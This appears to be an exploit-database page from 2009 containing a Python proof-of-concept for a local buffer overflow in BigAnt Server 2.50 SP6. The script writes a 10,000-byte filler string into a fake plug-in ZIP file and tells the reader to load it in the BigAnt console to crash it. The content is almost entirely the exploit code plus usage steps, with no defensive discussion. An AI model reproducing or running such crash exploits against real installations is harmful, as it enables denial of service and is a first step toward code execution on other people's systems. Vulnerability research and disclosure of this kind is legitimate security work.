[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Published : 2009-09-21
# Author : Dr_IDE
# Previous Title : Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify
# Next Title : Xerver HTTP Server <= v4.32 Remote Denial of Service
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
# www.Syue.com [2009-09-21]